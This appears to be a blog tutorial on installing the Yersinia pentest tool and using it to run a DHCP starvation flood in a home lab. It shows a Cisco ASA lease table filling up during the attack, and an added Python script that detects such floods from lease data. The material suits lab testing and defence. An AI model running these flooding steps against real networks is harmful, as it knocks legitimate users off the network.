Starving your DHCP server of IP addresses is something you want to avoid. But for several reasons, you may want to test this scenario in a lab environment. Yersinia is a penetration test tool that accomplishes this. It is a network tool designed to take advantage of some weaknesses in different network protocols: STP, HSRP, CDP, DTP and more.
Today I discuss how to use Yersinia to exhaust the IP addresses of a DHCP server. Yersinia runs on Linux. Precompiled packages exist for Ubuntu, FreeBSD and Debian, and it has been ported to Mac OS X. Below, you will find instructions on how to install Yersinia under Ubuntu Linux and Mac OS X.
Ubuntu Install
Installing Yersinia under Ubuntu is straightforward.
- Start a terminal session, from the main menu: Applications > Accessories > Terminal
- Type the following command: sudo apt-get install yersinia
Usage
From a terminal session, type: sudo yersinia -G
The -G flag invokes a GUI session:
Then, select the DHCP tab, click the Launch attack toolbar button and select <sending DISCOVER packet>. After you click OK, the attack will start and will exhaust your DHCP server pool. You should see the DHCP and Total counters increasing in the blue colored left hand side pane. To stop the attack, click the Exit toolbar button.
Mac OS X Install
Yersinia has been ported to Mac OS X as a Darwin port. As a prerequisite, your MacBook must have MacPorts installed. In a previous blog, I explained how to do this, see MacPorts Interesting Free Tools
Once you have MacPorts all set:
- Start a terminal window: from Finder, go to the Utilities Menu and select Terminal.app or simply select it from Spotlight (Command-Space)
- Type the following command to install Yersinia: sudo port install yersinia
Usage
Yersinia provides a native GTK graphical interface meant for Linux. It is not compatible with OS X. However, you have two more options: command line interface or nCurses. The nCurses option is the easiest one, giving you a semi-graphical navigational interface. Launch it as follows: sudo yersinia -I (capital i)
You will get a message informing you that en0 is the default interface used. Press any key to continue.
In my case, I use en1 most of the time (the Airport WiFi interface). To change to en1, type i
Next, type c) for en1. You might want to disable en0 if you don't use it. Then type q.
NOTE: To get help, you can type either h or ?
Now you want to select the DHCP flooding test by typing g and navigate with your up arrow to DHCP and press the Enter key.
Next, type x to launch the attack panel. Then type 1 (sending DISCOVER packet)
Counters will start increasing in Total Packets and DHCP Packets at the bottom of the display
To stop the attack, type l (lower case L), then press the Enter key.
Results
My DHCP server runs off a Cisco ASA5505 firewall. Its DHCP pool contains 51 addresses. Here is the IP address allocation before the attack:
MON-ASA# sh dhcpd binding
IP address Hardware address Lease expiration Type
192.168.1.125 0158.b035.6a61.be 3587 seconds Automatic
After the attack:
MON-ASA# sh dhcpd binding
IP address Hardware address Lease expiration Type
192.168.1.100 f355.826b.f86d 289 seconds Automatic
192.168.1.101 100e.be49.c867 289 seconds Automatic
192.168.1.102 9cf1.da52.ada0 290 seconds Automatic
192.168.1.103 c3ed.5303.cdcc 290 seconds Automatic
192.168.1.104 6bb2.fe56.4563 290 seconds Automatic
192.168.1.105 5797.4b21.fc0d 290 seconds Automatic
192.168.1.106 ed77.9e56.d0ba 290 seconds Automatic
192.168.1.107 e9a9.f82a.cef3 290 seconds Automatic
192.168.1.108 2e41.cd26.7132 290 seconds Automatic
192.168.1.109 8220.cc04.d5d3 290 seconds Automatic
192.168.1.110 9258.2f39.1c20 290 seconds Automatic
192.168.1.111 18a8.652a.5339 290 seconds Automatic
192.168.1.112 1a87.ac2b.fabe 291 seconds Automatic
192.168.1.113 6ebf.d37f.7b95 291 seconds Automatic
192.168.1.114 6cc6.ab06.c61e 291 seconds Automatic
192.168.1.115 d3ec.e128.8d8e 291 seconds Automatic
192.168.1.116 ba32.055a.836d 291 seconds Automatic
192.168.1.117 c03a.953b.3651 291 seconds Automatic
192.168.1.118 852f.ac5e.6c67 291 seconds Automatic
192.168.1.119 f2d2.114b.9b17 291 seconds Automatic
192.168.1.120 718a.4140.a7d6 291 seconds Automatic
192.168.1.121 2475.7330.3e19 291 seconds Automatic
192.168.1.122 b70b.c105.797a 292 seconds Automatic
192.168.1.123 21d3.eb39.7379 291 seconds Automatic
192.168.1.124 fc05.ee26.5b32 291 seconds Automatic
192.168.1.125 0158.b035.6a61.be 3340 seconds Automatic
192.168.1.126 017c.c537.f2b8.3f 3580 seconds Automatic
192.168.1.127 ed35.660c.fdb9 286 seconds Automatic
192.168.1.128 aa95.5115.aa96 286 seconds Automatic
192.168.1.129 e9f6.5215.afbe 286 seconds Automatic
192.168.1.130 9c34.244d.4dc9 286 seconds Automatic
192.168.1.131 4ae0.8332.4248 286 seconds Automatic
192.168.1.132 7893.6404.d3ed 286 seconds Automatic
192.168.1.133 9fa0.bd3d.0ad0 287 seconds Automatic
192.168.1.134 ae47.f259.9659 287 seconds Automatic
192.168.1.135 2b9d.5900.5833 287 seconds Automatic
192.168.1.136 9bc8.d845.94d7 287 seconds Automatic
192.168.1.137 6ec8.e45d.7dd6 287 seconds Automatic
192.168.1.138 9126.4e22.4f09 287 seconds Automatic
192.168.1.139 00bd.564b.bce8 287 seconds Automatic
192.168.1.140 2a74.047e.d4eb 287 seconds Automatic
192.168.1.141 c8e0.c923.456b 287 seconds Automatic
192.168.1.142 160a.1878.e546 287 seconds Automatic
192.168.1.143 d658.6d4c.29ad 288 seconds Automatic
192.168.1.144 063d.8920.7fb1 288 seconds Automatic
192.168.1.145 5043.8a28.4fdf 288 seconds Automatic
192.168.1.146 90e9.3d11.a87e 288 seconds Automatic
192.168.1.147 1e63.7344.aa92 288 seconds Automatic
192.168.1.148 53eb.2901.ee05 288 seconds Automatic
192.168.1.149 47e4.6d7e.1d8e 288 seconds Automatic
192.168.1.150 5855.2c0a.3a00 288 seconds Automatic
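A defender-side check over a binding table like the one above, as an added example that is not part of the original post. It parses the `sh dhcpd binding` layout and reports two signs visible in that output: hardware addresses with the multicast (group) bit set, and a burst of leases that all expire within a few seconds of each other. The sample rows, function names, and thresholds are constructed for illustration, and treating a 7-byte value as type byte 01 plus MAC is an assumption.

```python
import re

# Constructed sample in the layout of the "sh dhcpd binding" output above.
SAMPLE = """\
IP address Hardware address Lease expiration Type
10.0.0.10 0100.1122.3344.55 3500 seconds Automatic
10.0.0.11 f301.0203.0405 289 seconds Automatic
10.0.0.12 1002.0304.0506 289 seconds Automatic
10.0.0.13 c303.0405.0607 290 seconds Automatic
10.0.0.14 6b04.0506.0708 291 seconds Automatic
10.0.0.15 9c05.0607.0809 292 seconds Automatic
"""

ROW = re.compile(r"^(\d+\.\d+\.\d+\.\d+)\s+([0-9a-f.]+)\s+(\d+) seconds", re.I | re.M)

def parse_bindings(text):
    """Return (ip, mac_bytes, seconds_left) for every lease row."""
    rows = []
    for ip, hw, secs in ROW.findall(text):
        raw = bytes.fromhex(hw.replace(".", ""))
        # Assumption: a 7-byte value is a client-id, type byte 01 + MAC.
        mac = raw[1:] if len(raw) == 7 and raw[0] == 1 else raw
        rows.append((ip, mac, int(secs)))
    return rows

def starvation_indicators(rows, pool_size, window=10):
    """Summarise the signs a DISCOVER flood leaves in the lease table."""
    # Real stations never source frames from a group (multicast) address,
    # but randomly generated MACs set that bit about half of the time.
    group_bit = [ip for ip, mac, _ in rows if mac[0] & 1]
    # Largest set of leases expiring within `window` seconds of each other:
    # a flood hands out most of the pool in one burst.
    secs = sorted(s for _, _, s in rows)
    burst, lo = 0, 0
    for hi, s in enumerate(secs):
        while s - secs[lo] > window:
            lo += 1
        burst = max(burst, hi - lo + 1)
    return {
        "utilization": len(rows) / pool_size,
        "group_bit_macs": group_bit,
        "burst": burst,
        # Illustrative threshold: half the pool in one burst, or any group-bit MAC.
        "suspect": burst >= 0.5 * pool_size or len(group_bit) > 0,
    }

if __name__ == "__main__":
    print(starvation_indicators(parse_bindings(SAMPLE), pool_size=6))
```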
Conclusion
Yersinia is an excellent pentest suite to have in your lab toolkit. It can perform flooding of DHCP requests or act as a rogue DHCP server. In a matter of seconds, it filled up a 50 IP address DHCP pool. Make sure you use it in a lab.
For more information, please visit the Yersinia home page:
http://www.yersinia.net/index.htm
The types of attacks supported are listed here:
http://www.yersinia.net/attacks.htm